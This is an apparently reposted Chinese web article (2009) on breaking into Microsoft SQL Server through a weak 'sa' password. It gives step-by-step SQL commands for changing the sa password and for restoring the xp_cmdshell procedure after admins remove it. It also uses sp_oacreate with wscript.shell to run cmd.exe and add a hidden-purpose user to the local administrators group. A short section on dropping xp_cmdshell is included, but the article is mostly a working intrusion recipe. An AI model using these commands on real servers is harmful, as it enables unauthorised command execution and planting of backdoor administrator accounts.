打印本文 关闭窗口 | |
用SQL分离器实现sa弱口令强行入侵 | |
作者:陈鹏 文章来源:eNet 点击数 更新时间:2009/9/11 23:33:00 文章录入:陈鹏 责任编辑:陈鹏 | |
|
|
下面这些命令要SQL分离器才能实现,下面是一些关于sa弱口令相关命令。 注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。 一.更改sa口令方法: 用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa' (提示:慎用!) 二.简单修补sa弱口令: 方法1:查询分离器连接后执行: if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1) exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' GO 然后按F5键命令执行完毕。 方法2:查询分离器连接后 第一步执行:use master, 第二步执行:sp_dropextendedproc 'xp_cmdshell', 然后按F5键命令执行完毕。 三.常见情况恢复执行xp_cmdshell: 1 未能找到存储过程'master..xpcmdshell'。 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int, 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll', 然后按F5键命令执行完毕。 2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。) 恢复方法:查询分离器连接后, 第一步执行:sp_dropextendedproc "xp_cmdshell", 第二步执行:sp_addextendedproc 'xp_cmdshell','xpsql70.dll' 然后按F5键命令执行完毕。 3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 恢复方法:查询分离器连接后, 第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 然后按F5键命令执行完毕。 四.终极方法: 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, 2000servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add' xp或2003server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add' |
|
打印本文 关闭窗口 |